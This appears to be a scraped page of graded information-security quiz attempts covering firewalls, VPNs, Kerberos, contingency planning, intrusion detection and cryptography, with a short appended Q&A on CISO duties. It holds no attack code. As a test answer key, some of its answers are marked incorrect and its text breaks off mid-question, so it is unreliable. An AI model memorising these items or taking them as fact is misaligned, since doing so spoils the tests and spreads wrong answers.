modification, or update of a piece of equipment. Choose one answer.a. IP b. FCO c. CTO d. HTTP Correct Marks for this submission: 2/2. Question48Marks: 2 All information that has been approved by management for public release has a(n) ____________________ classification. Answer:external Correct Marks for this submission: 2/2. Question49Marks: 2 Comprehensive means that an information asset should fit in only one category. Answer: True False Correct Marks for this submission: 2/2. Question50Marks: 2 Risk ____ defines the quantity and nature of risk that organizations are willing to accept as they evaluate the tradeoffs between perfect security and unlimited accessibility. Choose one answer.a. benefit b. appetite c. acceptance d. avoidance Correct Marks for this submission: 2/2. Question1Marks: 2 The application firewall is also known as a(n) ____________________ server. Answer:proxy Correct Marks for this submission: 2/2. Question2Marks: 2 A Web server is often exposed to higher levels of risk when placed in the DMZ than when it is placed in the untrusted network. Answer: True False Correct Marks for this submission: 2/2. Question3Marks: 2 The architecture of a(n) ____________________ firewall provides a DMZ. Answer:screened subnet Correct Marks for this submission: 2/2. Question4Marks: 2 A packets structure is independent from the nature of the packet. Answer: True False Incorrect Marks for this submission: 0/2. Question5Marks: 2 In recent years, the broadband router devices that can function as packet-filtering firewalls have been enhanced to combine the features of ____. Choose one answer.a. UDPs b. MACs c. WANs d. WAPs Correct Marks for this submission: 2/2. Question6Marks: 2 A(n) ____________________ is an information security program that prevents specific types of information from moving between the outside world and the inside world. Answer:firew all Correct Marks for this submission: 2/2. Question7Marks: 2 A(n) ____________________ private network is a private and secure network connection between systems that uses the data communication capability of an unsecured and public network. Answer:virtual Correct Marks for this submission: 2/2. Question8Marks: 2 A trusted VPN is also known as a(n) ____________________ VPN. Answer:legacy Correct Marks for this submission: 2/2. Question9Marks: 2 SESAME uses ____________________ key encryption to distribute secret keys. Answer: public Correct Marks for this submission: 2/2. Question10Marks: 2 Traces, formally known as ICMP Echo requests, are used by internal systems administrators to ensure that clients and servers can communicate. Answer: True False Correct Marks for this submission: 2/2. Question11Marks: 2 In Kerberos, a(n) ____________________ is an identification card for a particular client that verifies to the server that the client is requesting services and that the client is a valid member of the Kerberos system and therefore authorized to receive services. Answer:ticket Correct Marks for this submission: 2/2. Question12Marks: 2 Static filtering is common in network routers and gateways. Answer: True False Correct Marks for this submission: 2/2. Question13Marks: 2 A(n) ____________________ filter is a software filter technically not a firewall that allows administrators to restrict access to content from within a network. Answer: content Correct Marks for this submission: 2/2. Question14Marks: 2 The circuit gateway firewall operates at the ____________________ layer. Answer:transport Correct Marks for this submission: 2/2. Question15Marks: 2 SESAME may be obtained free of charge from MIT. Answer: True False Correct Marks for this submission: 2/2. Question16Marks: 2 In ____ mode, the data within an IP packet is encrypted, but the header information is not. Choose one answer.a. tunnel b. transport c. public d. symmetric Correct Marks for this submission: 2/2. Question17Marks: 2 A(n) ____________________ dialer is an automatic phone-dialing program that dials every number in a configured range, and checks to see if a person, answering machine, or modem picks up. Answer:w ar Correct Marks for this submission: 2/2. Question18Marks: 2 The restrictions most commonly implemented in packet-filtering firewalls are based on ____. Choose one answer.a. IP source and destination address b. Direction (inbound or outbound) c. TCP or UDP source and destination port requests d. All of the above Correct Marks for this submission: 2/2. Question19Marks: 2 A packet-____________________ firewall installed on a TCP/IP based network typically functions at the IP level and determines whether to drop a packet (deny) or forward it to the next network connection (allow) based on the rules programmed into the firewall. Answer:filtering Correct Marks for this submission: 2/2. Question20Marks: 2 The dominant architecture used to secure network access today is the ____ firewall. Choose one answer. a. static b. bastion c. unlimited d. screened subnet Correct Marks for this submission: 2/2. Question21Marks: 2 A(n) perimeter is a segment of the DMZ where additional authentication and authorization controls are put into place to provide services that are not available to the general public. Answer: True False Correct Marks for this submission: 2/2. Question22Marks: 2 The proxy server is often placed in an unsecured area of the network or is placed in the ____ zone. Choose one answer.a. fully trusted b. hot c. demilitarized d. cold Correct Marks for this submission: 2/2. Question23Marks: 2 A content filter is essentially a set of scripts or programs that restricts user access to certain networking protocols and Internet locations. Answer: True False Correct Marks for this submission: 2/2. Question24Marks: 2 Simple firewall models enforce address ____________________, which are rules designed to prohibit packets with certain addresses or partial addresses from passing through the device. Answer:restrictions Correct Marks for this submission: 2/2. Question25Marks: 2 A VPN allows a user to use the Internet into a private network. Answer: True False Correct Marks for this submission: 2/2. Question26Marks: 2 First generation firewalls are application-level firewalls. Answer: True False Correct Marks for this submission: 2/2. Question27Marks: 2 A(n) ____ is a private data network that makes use of the public telecommunication infrastructure, maintaining privacy through the use of a tunneling protocol and security procedures. Choose one answer. a. SVPN b. VPN c. SESAME d. KERBES Correct Marks for this submission: 2/2. Question28Marks: 2 A content filter is technically a firewall. Answer: True False Correct Marks for this submission: 2/2. Question29Marks: 2 In most common implementation models, the content filter has two components: ____. Choose one answer.a. encryption and decryption b. filtering and encoding c. rating and decryption d. rating and filtering Correct Marks for this submission: 2/2. Question30Marks: 2 Circuit gateway firewalls prevent direct connections between one network and another. Answer: True False Correct Marks for this submission: 2/2. Question31Marks: 2 Since the bastion host stands as a sole defender on the network perimeter, it is commonly referred to as the ____ host. Choose one answer.a. trusted b. domain c. single d. sacrificial Correct Marks for this submission: 2/2. Question32Marks: 2 Content filters are often called ____________________ firewalls. Answer:reverse Correct Marks for this submission: 2/2. Question33Marks: 2 Kerberos ____ provides tickets to clients who request services. Choose one answer.a. KDS b. TGS c. AS d. VPN Correct Marks for this submission: 2/2. Question34Marks: 2 The ____ is an intermediate area between a trusted network and an untrusted network. Choose one answer.a. perimeter b. DMZ c. domain d. firewall Incorrect Marks for this submission: 0/2. Question35Marks: 2 A benefit of a(n) dual-homed host is its ability to translate between many different protocols at their respective data link layers, including Ethernet, token ring, Fiber Distributed Data Interface, and asynchronous transfer mode. Answer: True False Correct Marks for this submission: 2/2. Question36Marks: 2 Address grants prohibit packets with certain addresses or partial addresses from passing through the device. Answer: True False Incorrect Marks for this submission: 0/2. Question37Marks: 2 ICMP uses port ____ to request a response to a query and can be the first indicator of a malicious attack. Choose one answer.a. 4 b. 7 c. 8 d. 48 Correct Marks for this submission: 2/2. Question38Marks: 2 ISA Server can use ____ technology. Choose one answer.a. PNP b. Point to Point Tunneling Protocol c. RAS d. All of the above Correct Marks for this submission: 2/2. Question39Marks: 2 Firewalls fall into ____ major processing-mode categories. Choose one answer. a. two b. three c. four d. five Correct Marks for this submission: 2/2. Question40Marks: 2 SOHO assigns non-routing local addresses to the computer systems in the local area network and uses the single ISP-assigned address to communicate with the Internet. Answer: True False Correct Marks for this submission: 2/2. Question41Marks: 2 Secure VPNs use security protocols and encrypt traffic transmitted across unsecured public networks like the Internet. Answer: True False Correct Marks for this submission: 2/2. Question42Marks: 2 The firewall device is never accessible directly from the ____________________ network. Answer:public Correct Marks for this submission: 2/2. Question43 Marks: 2 Since the bastion host stands as a sole defender on the network perimeter, it is commonly referred to as the ____________________ host. Answer:sacrificial Correct Marks for this submission: 2/2. Question44Marks: 2 A ____ filtering firewall can react to an emergent event and update or create rules to deal with the event. Choose one answer.a. dynamic b. static c. stateful d. stateless Correct Marks for this submission: 2/2. Question45Marks: 2 Telnet protocol packets usually go to TCP port ____. Choose one answer.a. 7 b. 8 c. 14 d. 23 Correct Marks for this submission: 2/2. Question46Marks: 2 The fifth generation firewalls include the ____________________ proxy, a specialized form that works under Windows NT Executive, which is the kernel of Windows NT. Answer:kernel Correct Marks for this submission: 2/2. Question47Marks: 2 Access control is achieved by means of a combination of policies, programs, and technologies. Answer: True False Incorrect Marks for this submission: 0/2. Question48Marks: 2 In SESAME, the user is first authenticated to an authentication server and receives a token. The token is then presented to a privilege attribute server as proof of identity to gain a(n) ____. Choose one answer.a. VPN b. ECMA c. ticket d. PAC Correct Marks for this submission: 2/2. Question49Marks: 2 In ____________________ mode, the organization establishes two perimeter tunnel servers. Answer: tunel Incorrect Correct answer: tunnel Marks for this submission: 0/2. Question50Marks: 2 The application gateway is also known as a(n) ____. Choose one answer.a. application-level firewall b. client firewall c. proxy firewall d. All of the above Correct Marks for this submission: 2/2. Chapter 5 Review Questions Review of attempt 1Top of Form Finish reviewBottom of Form Started on Wednesday, June 15, 2011, 07:33 PM Completed on Saturday, June 18, 2011, 02:34 AM Time taken 2 days 7 hours Grade 90 out of a maximum of 100 (90%) Question1Marks: 2 A(n) ____________________ site is a fully configured computer facility, with all services, communications links, and physical plant operations including heating and air conditioning. Answer:hot Correct Marks for this submission: 2/2. Question2Marks: 2 A standard is a plan or course of action that conveys instructions from an organizations senior management to those who make decisions, take actions, and perform other duties. Answer: True False Correct Marks for this submission: 2/2. Question3Marks: 2 A policy should state that if employees violate a company policy or any law using company technologies, the company will protect them, and the company is liable for the employees actions. Answer: True False Incorrect Marks for this submission: 0/2. Question4Marks: 2 The first phase in the development of the contingency planning process is the ____. Choose one answer.a. BIA b. BRP c. DP9 d. IRP Incorrect Marks for this submission: 0/2. Question5Marks: 2 A security ____ is an outline of the overall information security strategy for the organization and a roadmap for planned changes to the information security environment of the organization. Choose one answer.a. plan b. framework c. mission d. blanket Correct Marks for this submission: 2/2. Question6Marks: 2 Implementing multiple types of technology and thereby precluding that the failure of one system will compromise the security of information is referred to as ____________________. Answer:redundancy Correct Marks for this submission: 2/2. Question7Marks: 2 Security ____ are the areas of trust within which users can freely communicate. Choose one answer.a. perimeters b. domains c. rectangles d. layers Correct Marks for this submission: 2/2. Question8Marks: 2 A(n) ____________________ is a device that selectively discriminates against information flowing into or out of the organization. Answer:firew all Correct Marks for this submission: 2/2. Question9Marks: 2 An attack ____________________ is a detailed description of the activities that occur during an attack. Answer:profile Correct Marks for this submission: 2/2. Question10Marks: 2 A(n) capability table specifies which subjects and objects users or groups can access. Answer: True False Correct Marks for this submission: 2/2. Question11Marks: 2 A service bureau is an agency that provides a service for a fee. Answer: True False Correct Marks for this submission: 2/2. Question12Marks: 2 A buffer against outside attacks is frequently referred to as a(n) ____. Choose one answer.a. proxy server b. no-mans land c. DMZ d. firewall Correct Marks for this submission: 2/2. Question13Marks: 2 The Security Area Working Group acts as an advisory board for the protocols and areas developed and promoted by the Internet Society and the ____. Choose one answer.a. IETF b. ISO/IEC c. ISOC d. IRTF Correct Marks for this submission: 2/2. Question14Marks: 2 A firewall can be a single device or a firewall extranet, which consists of multiple firewalls creating a buffer between the outside and inside networks. Answer: True False Correct Marks for this submission: 2/2. Question15Marks: 2 Systems-specific security policies are formalized as written documents readily identifiable as policy. Answer: True False Incorrect Marks for this submission: 0/2. Question16Marks: 2 A(n) ____________________ plan ensures that critical business functions continue if a catastrophic incident or disaster occurs. Answer:disaster recovery Incorrect Correct answer: business continuity Marks for this submission: 0/2. Question17Marks: 2 The spheres of ____ are the foundation of the security framework and illustrate how information is under attack from a variety of sources. Choose one answer.a. defense b. assessment c. security d. information Correct Marks for this submission: 2/2. Question18Marks: 2 Policies are living documents that must be managed. Answer: True False Correct Marks for this submission: 2/2. Question19Marks: 2 NIST documents can assist in the design of a security framework. Answer: True False Correct Marks for this submission: 2/2. Question20Marks: 2 RAID ____ drives can be hot swapped. Choose one answer.a. 2 b. 3 c. 4 d. 5 Correct Marks for this submission: 2/2. Question21Marks: 2 Incident ____________________ is the process of examining a potential incident, or incident candidate, and determining whether or not the candidate constitutes an actual incident. Answer:classification Correct Marks for this submission: 2/2. Question22Marks: 2 A disaster recovery plan addresses the preparation for and recovery from a disaster, whether natural or man-made. Answer: True False Correct Marks for this submission: 2/2. Question23Marks: 2 Laws are more detailed statements of what must be done to comply with policy. Answer: True False Correct Marks for this submission: 2/2. Question24Marks: 2 An alert ____ is a document containing contact information for the people to be notified in the event of an incident. Choose one answer.a. message b. roster c. plan d. list Correct Marks for this submission: 2/2. Question25Marks: 2 A cold site provides many of the same services and options of a hot site. Answer: True False Correct Marks for this submission: 2/2. Question26Marks: 2 A(n) ____ plan deals with the identification, classification, response, and recovery from an incident. Choose one answer.a. CM b. BC c. DR d. IR Correct Marks for this submission: 2/2. Question27Marks: 2 Incident damage ____ is the rapid determination of the scope of the breach of the confidentiality, integrity, and availability of information and information assets during or just following an incident. Choose one answer.a. assessment b. evaluation c. recovery d. plan Correct Marks for this submission: 2/2. Question28Marks: 2 Standards may be published, scrutinized, and ratified by a group, as in formal or ____ standards. Choose one answer.a. de formale b. de public c. de jure d. de facto Correct Marks for this submission: 2/2. Question29Marks: 2 Strategic planning is the process of moving the organization towards its ____. Choose one answer.a. standard b. policy c. mission d. vision Correct Marks for this submission: 2/2. Question30Marks: 2 A(n) ____________________ is any clearly identified attack on the organizations information assets that would threaten the assets confidentiality, integrity, or availability. Answer:incident Correct Marks for this submission: 2/2. Question31Marks: 2 A(n) ____________________ backup is the storage of all files that have changed or been added since the last full backup. Answer:differential Correct Marks for this submission: 2/2. Question32Marks: 2 A(n) contingency plan is prepared by the organization to anticipate, react to, and recover from events that threaten the security of information and information assets in the organization, and, subsequently, to restore the organization to normal modes of business operations. Answer: True False Correct Marks for this submission: 2/2. Question33Marks: 2 Host-based IDPSs are usually installed on the machines they protect to monitor the status of various files stored on those machines. Answer: True False Incorrect Marks for this submission: 0/2. Question34Marks: 2 A(n) ____________________ message is a scripted description of an incident, usually just enough information so that each individual knows what portion of the IRP to implement, and not enough to slow down the notification process. Answer:alert Correct Marks for this submission: 2/2. Question35Marks: 2 A(n) ____________________ server performs actions on behalf of another system. Answer:proxy Correct Marks for this submission: 2/2. Question36Marks: 2 A(n) ____________________ is a contract between two or more organizations that specifies how each will assist the other in the event of a disaster. Answer:mutual agreement Correct Marks for this submission: 2/2. Question37Marks: 2 Effective management includes planning and ____. Choose one answer.a. organizing b. leading c. controlling d. All of the above Correct Marks for this submission: 2/2. Question38Marks: 2 A managerial guidance SysSP document is created by the IT experts in a company to guide management in the implementation and configuration of technology. Answer: True False Correct Marks for this submission: 2/2. Question39Marks: 2 Technical controls are the tactical and technical implementations of security in the organization. Answer: True False Correct Marks for this submission: 2/2. Question40Marks: 2 Incident ____________________ is the set of activities taken to plan for, detect, and correct the impact of an incident on information assets. Answer:response Correct Marks for this submission: 2/2. Question41Marks: 2 A ____ site provides only rudimentary services and facilities. Choose one answer. a. cool b. warm c. hot d. cold Correct Marks for this submission: 2/2. Question42Marks: 2 A(n) ____________________ is a detailed examination of the events that occurred from first detection to final recovery. Answer:after-action review Correct Marks for this submission: 2/2. Question43Marks: 2 A(n) ____________________ is a plan or course of action that conveys instructions from an organizations senior management to those who make decisions, take actions, and perform other duties. Answer:policy Correct Marks for this submission: 2/2. Question44Marks: 2 A security ____________________ defines the boundary between the outer limit of an organizations security and the beginning of the outside world. Answer:perimeter Correct Marks for this submission: 2/2. Question45Marks: 2 Redundancy can be implemented at a number of points throughout the security architecture, such as in ____. Choose one answer.a. firewalls b. proxy servers c. access controls d. All of the above Correct Marks for this submission: 2/2. Question46Marks: 2 The SETA program is the responsibility of the ____ and is a control measure designed to reduce the incidences of accidental security breaches by employees. Choose one answer.a. CIO b. CISCO c. CISO d. end users Correct Marks for this submission: 2/2. Question47Marks: 2 Evidence is the physical object or documented information that proves an action occurred or identifies the intent of a perpetrator. Answer: True False Correct Marks for this submission: 2/2. Question48Marks: 2 Computer ____________________ is the process of collecting, analyzing, and preserving computerrelated evidence. Answer:forensics Correct Marks for this submission: 2/2. Question49Marks: 2 RAID Level 1 is commonly called disk ____________________. Answer:mirroring Correct Marks for this submission: 2/2. Question50Marks: 2 SP 800-14, Generally Accepted Principles and Practices for Securing Information Technology Systems, provides best practices and security principles that can direct the security team in the development of a security ____. Choose one answer.a. plan b. standard c. policy d. blueprint Correct Marks for this submission: 2/2. Chapter 7 Review Questions Review of attempt 1Top of Form Marks: 2 A(n) ____________________ vulnerability scanner is one that initiates traffic on the network in order to determine security holes. Answer:active Correct Marks for this submission: 2/2. Question 2 Marks: 2 Activities that scan network locales for active systems and then identify the network services offered by the host systems is known as ____. Choose one answer. a. filtering b. doorknob rattling c. footprinting d. fingerprinting Correct Marks for this submission: 2/2. Question 3 Marks: 2 A(n) ____ is a proposed systems user. Choose one answer. a. authenticator b. challenger c. supplicant d. activator Incorrect Marks for this submission: 0/2. Question 4 Marks: 2 A(n) listener vulnerability scanner is one that listens in on the network and determines vulnerable versions of both server and client software. Answer: True False Correct Marks for this submission: 2/2. Question 5 Marks: 2 ____ applications use a combination of techniques to detect an intrusion and then trace it back to its source. Choose one answer. a. Trace and treat b. Trap and trace c. Treat and trap d. Trace and clip Correct Marks for this submission: 2/2. Question 6 Marks: 2 ____ are decoy systems designed to lure potential attackers away from critical systems. Choose one answer. a. Honeypots b. Honeycells c. Padded cells d. Padded nets Correct Marks for this submission: 2/2. Question 7 Marks: 2 A(n) ____________________ system contains pseudo-services that emulate well-known services, but is configured in ways that make it look vulnerable to attacks. Answer:honey pot Incorrect Correct answer: honeypot Marks for this submission: 0/2. Question 8 Marks: 2 Intrusion ____ activities finalize the restoration of operations to a normal state and seek to identify the source and method of the intrusion in order to ensure that the same type of attack cannot occur again. Choose one answer. a. prevention b. reaction c. detection d. correction Incorrect Marks for this submission: 0/2. Question 9 Marks: 2 Enticement is the action of luring an individual into committing a crime to get a conviction. Answer: True False Correct Marks for this submission: 2/2. Question 10 Marks: 2 A passive response is a definitive action automatically initiated when certain types of alerts are triggered. Answer: True False Correct Marks for this submission: 2/2. Question 11 Marks: 2 Which of the following ports is commonly used for the HTTP protocol? Choose one answer. a. 20 b. 25 c. 53 d. 80 Correct Marks for this submission: 2/2. Question 12 Marks: 2 A sniffer cannot be used to eavesdrop on network traffic. Answer: True False Correct Marks for this submission: 2/2. Question 13 Marks: 2 A(n) ____________________ occurs when an attacker attempts to gain entry or disrupt the normal operations of an information system, almost always with the intent to do harm. Answer:intrusion Correct Marks for this submission: 2/2. Question 14 Marks: 2 A HIDPS can monitor systems logs for predefined events. Answer: True False Correct Marks for this submission: 2/2. Question 15 Marks: 2 The ongoing activity from alarm events that are accurate and noteworthy but not necessarily significant as potentially successful attacks is called ____________________. Answer:noise Correct Marks for this submission: 2/2. Question 16 Marks: 2 A(n) ____________________ IDPS can adapt its reactions in response to administrator guidance over time and circumstances of the current local environment. Answer:smart Correct Marks for this submission: 2/2. Question 17 Marks: 2 In TCP/IP networking, port ____ is not used. Choose one answer. a. 0 b. 1 c. 13 d. 1023 Correct Marks for this submission: 2/2. Question 18 Marks: 2 A signature-based IDPS is sometimes called a(n) ____________________-based IDPS. Answer:know ledge Correct Marks for this submission: 2/2. Question 19 Marks: 2 IDPS researchers have used padded cell and honeypot systems since the late ____. Choose one answer. a. 1960s b. 1970s c. 1980s d. 1990s Correct Marks for this submission: 2/2. Question 20 Marks: 2 Alarm ____________________ and compaction is a consolidation of almost identical alarms that happen at close to the same time into a single higher-level alarm. Answer:clustering Correct Marks for this submission: 2/2. Question 21 Marks: 2 Using ____, the system reviews the log files generated by servers, network devices, and even other IDPSs. Choose one answer. a. LFM b. stat IDPS c. AppIDPS d. HIDPS Correct Marks for this submission: 2/2. Question 22 Marks: 2 A starting scanner is one that initiates traffic on the network in order to determine security holes. Answer: True False Correct Marks for this submission: 2/2. Question 23 Marks: 2 A(n) ____________________ is a honey pot that has been protected so that it cannot be easily compromised. Answer:padded cell Correct Marks for this submission: 2/2. Question 24 Marks: 2 The initial estimation of the defensive state of an organizations networks and systems is called doorknob ____________________. Answer:rattling Correct Marks for this submission: 2/2. Question 25 Marks: 2 In ____________________ protocol verification, the higher-order protocols are examined for unexpected packet behavior, or improper use. Answer:application Correct Marks for this submission: 2/2. Question 26 Marks: 2 Three methods dominate the IDPSs detection methods: ____________________-based approach, statistical anomaly-based approach or the stateful packet inspection approach. Answer:signature Correct Marks for this submission: 2/2. Question 27 Marks: 2 A strategy based on the concept of defense in depth is likely to include intrusion detection systems, active vulnerability scanners, passive vulnerability scanners, automated log analyzers, and protocol analyzers. Answer: True False Incorrect Marks for this submission: 0/2. Question 28 Marks: 2 The attack ____________________ is a series of steps or processes used by an attacker, in a logical sequence, to launch an attack against a target system or network. Answer:protocol Correct Marks for this submission: 2/2. Question 29 Marks: 2 A HIDPS is optimized to detect multihost scanning, and it is able to detect the scanning of non-host network devices, such as routers or switches. Answer: True False Incorrect Marks for this submission: 0/2. Question 30 Marks: 2 Fingerprinting is the organized research of the Internet addresses owned or controlled by a target organization. Answer: True False Incorrect Marks for this submission: 0/2. Question 31 Marks: 2 A packet ____________________ is a network tool that collects copies of packets from the network and analyzes them. Answer:sniffer Correct Marks for this submission: 2/2. Question 32 Marks: 2 A(n) ____________________-based IDPS resides on a particular computer or server and monitors activity only on that system. Answer:host Correct Marks for this submission: 2/2. Question 33 Marks: 2 ____ are usually passive devices and can be deployed into existing networks with little or no disruption to normal network operations. Choose one answer. a. NIDPSs b. HIDPSs c. AppIDPSs d. SIDPSs Correct Marks for this submission: 2/2. Question 34 Marks: 2 A(n) ____ works like a burglar alarm in that it detects a violation (some system activities analogous to an opened or broken window) and activates an alarm. Choose one answer. a. IDS b. IIS c. ITS d. SIS Correct Marks for this submission: 2/2. Question 35 Marks: 2 Among all possible biometrics, ____ is(are) considered truly unique. Choose one answer. a. retina of the eye b. fingerprints c. iris of the eye d. All of the above Correct Marks for this submission: 2/2. Question 36 Marks: 2 A false positive is the failure of an IDPS system to react to an actual attack event. Answer: True False Correct Marks for this submission: 2/2. Question 37 Marks: 2 Most NBA sensors can be deployed in ____ mode only, using the same connection methods as network-based IDPSs. Choose one answer. a. passive b. active c. reactive d. dynamic Correct Marks for this submission: 2/2. Question 38 Marks: 2 A(n) ____ is a network tool that collects copies of packets from the network and analyzes them. Choose one answer. a. packet scanner b. packet sniffer c. honey pot d. honey packet Correct Marks for this submission: 2/2. Question 39 Marks: 2 HIDPSs are also known as system ____________________ verifiers. Answer:integrity Correct Marks for this submission: 2/2. Question 40 Marks: 2 A wireless security toolkit should include the ability to sniff wireless traffic, scan wireless hosts, and assess the level of privacy or confidentiality afforded on the wireless network. Answer: True False Correct Marks for this submission: 2/2. Question 41 Marks: 2 The ____________________ error rate is the level at which the number of false rejections equals the false acceptances, also known as the equal error rate. Answer:crossover Correct Marks for this submission: 2/2. Question 42 Marks: 2 The ____________________ port is also known as a switched port analysis port or mirror port. Answer:monitoring Correct Marks for this submission: 2/2. Question 43 Marks: 2 A(n) NIDPS functions on the host system, where encrypted traffic will have been decrypted and is available for processing. Answer: True False Incorrect Marks for this submission: 0/2. Question 44 Marks: 2 Minutiae are unique points of reference that are digitized and stored in an encrypted format when the users system access credentials are created. Answer: True Correct False Marks for this submission: 2/2. Question 45 Marks: 2 A fully distributed IDPS control strategy is the opposite of the centralized strategy. Answer: True False Correct Marks for this submission: 2/2. Question 46 Marks: 2 A(n) ____ IDPS is focused on protecting network information assets. Choose one answer. a. network-based b. host-based c. application-based d. server-based Correct Marks for this submission: 2/2. Question 47 Marks: 2 A(n) log file monitor is similar to a NIDPS. Answer: True False Correct Marks for this submission: 2/2. Question 48 Marks: 2 To determine whether an attack has occurred or is underway, NIDPSs compare measured activity to known ____ in their knowledge base. Choose one answer. a. fingernails b. fingerprints c. signatures d. footprints Correct Marks for this submission: 2/2. Question 49 Marks: 2 A padded cell is a hardened honeynet. Answer: True False Correct Marks for this submission: 2/2. Question 50 Marks: 2 ____ benchmark and monitor the status of key system files and detect when an intruder creates, modifies, or deletes monitored files. Choose one answer. a. NIDPSs b. HIDPSs c. AppIDPSs Question1Marks: 2 ____ are encrypted messages that can be mathematically proven to be authentic. Choose one answer.a. Digital signatures b. MAC c. Message certificates d. Message digests Correct Marks for this submission: 2/2. Question2Marks: 2 A(n) distinguished name uniquely identifies a certificate entity, to a users public key. Answer: True False Incorrect Marks for this submission: 0/2. Question3 Marks: 2 Privacy Enhanced Mail was proposed by the Internet Engineering Task Force and is a standard that uses 3DES symmetric key encryption and RSA for key exchanges and digital signatures. Answer: True False Correct Marks for this submission: 2/2. Question4Marks: 2 As DES became known as being too weak for highly classified communications, Double DES was created to provide a level of security far beyond that of DES. Answer: True False Correct Marks for this submission: 2/2. Question5Marks: 2 A(n) ____________________ substitution uses one alphabet. Answer:monoalphabetic Correct Marks for this submission: 2/2. Question6Marks: 2 An attacker may obtain duplicate texts, one in ciphertext and one in plaintext, and thus reverse-engineer the encryption algorithm in a known-plaintext attack scheme. Answer: True False Correct Marks for this submission: 2/2. Question7Marks: 2 In IPSEC ____________________ mode, only the IP data is encrypted, not the IP headers. Answer:transport Correct Marks for this submission: 2/2. Question8Marks: 2 Digital ____________________ are public-key container files that allow computer programs to validate the key and identify to whom it belongs. Answer:certificates Correct Marks for this submission: 2/2. Question9Marks: 2 Digital ____________________ are encrypted messages that can be mathematically proven to be authentic. Answer:signatures Correct Marks for this submission: 2/2. Question10Marks: 2 A message ____________________ is a fingerprint of the authors message that is compared with the recipients locally calculated hash of the same message. Answer:digest Correct Marks for this submission: 2/2. Question11Marks: 2 Digital signatures should be created using processes and products that are based on the ____. Choose one answer.a. DSS b. NIST c. SSL d. HTTPS Incorrect Marks for this submission: 0/2. Question12Marks: 2 DES uses a(n) _____-bit block size. Choose one answer.a. 32 b. 64 c. 128 d. 256 Correct Marks for this submission: 2/2. Question13Marks: 2 Symmetric encryption uses two different but related keys, and either key can be used to encrypt or decrypt the message. Answer: True False Correct Marks for this submission: 2/2. Question14Marks: 2 ____ attacks are a collection of brute-force methods that attempt to deduce statistical relationships between the structure of the unknown key and the ciphertext that is the output of the cryptosystem. Choose one answer.a. Timing b. Dictionary c. Correlation d. Man-in-the-middle Correct Marks for this submission: 2/2. Question15Marks: 2 A(n) ____________________ authority operates under the trusted collaboration of the certificate authority and can be delegated day-to-day certification functions, such as verifying registration information about new registrants, generating end-user keys, revoking certificates, and validating that users possess a valid certificate. Answer:registration Correct Marks for this submission: 2/2. Question16Marks: 2 The science of encryption is known as ____________________. Answer:cryptology Correct Marks for this submission: 2/2. Question17Marks: 2 A ____ is a key-dependent, one-way hash function that allows only specific recipients (symmetric key holders) to access the message digest. Choose one answer. a. signature b. MAC c. fingerprint d. digest Correct Marks for this submission: 2/2. Question18Marks: 2 Common implementations of RA include systems that issue digital certificates to users and servers; directory enrollment; key issuing systems; tools for managing the key issuance; and verification and return of certificates. Answer: True False Correct Marks for this submission: 2/2. Question19Marks: 2 The CA periodically distributes a(n) ____ to all users that identifies all revoked certificates. Choose one answer.a. CRL b. RA c. MAC d. AES Correct Marks for this submission: 2/2. Question20Marks: 2 Attackers may conduct an encrypted-plaintext attack by sending potential victims a specific text that they are sure the victims will forward on to others. Answer: True False Correct Marks for this submission: 2/2. Question21Marks: 2 The ____ algorithm was the first public key encryption algorithm developed (in 1977) and published for commercial use. Choose one answer.a. DES b. RSA c. MAC d. AES Correct Marks for this submission: 2/2. Question22Marks: 2 A mathematical ____________________ is a secret mechanism that enables you to easily accomplish the reverse function in a one-way function. Answer:trapdoor Correct Marks for this submission: 2/2. Question23Marks: 2 In a ____ attack, the attacker eavesdrops during the victims session and uses statistical analysis of patterns and inter-keystroke timings to discern sensitive session information. Choose one answer. a. replay b. timing c. correlation d. dictionary Correct Marks for this submission: 2/2. Question24Marks: 2 In a(n) ____________________ attack, the attacker eavesdrops on the victims session and uses statistical analysis of patterns and inter-keystroke timings to discern sensitive session information. Answer:timing Correct Marks for this submission: 2/2. Question25Marks: 2 A(n) key is the programmatic steps used to convert an unencrypted message into an encrypted sequence of bits that represent the message. Answer: True False Correct Marks for this submission: 2/2. Question26Marks: 2 Hash algorithms are public functions that create a hash value by converting variable-length messages int What is the chief information security officer primarily responsible for quizlet?The Chief Information Security Officer (CISO) is primarily responsible for the assessment, management, and implementation of information security in the organization.
What functions does the CISO perform quizlet?The CISO exercises overall responsibility for the organization's information technology security-related programs, such as risk management, policy development and compliance monitoring, security awareness, incident investigation and reporting, and often contingency planning.
Is a group of individuals who are united by similar interests or values?In sociology, a peer group is both a social group and a primary group of people who have similar interests (homophily), age, background, or social status. The members of this group are likely to influence the person's beliefs and behaviour.
When information is whole complete and uncorrupted?What are the three components of the C.I.A triangle? Confidentiality, Integrity, Availability. In Information Security, accuracy is the quality or state of being genuine or original. In Information Security, Integrity is when an information is whole, complete, and uncorrupted.
|
The senior technology officer is typically the chief ____________________ officer.
zusammenhängende Posts
Urheberrechte © © 2024 berikutyang Inc.
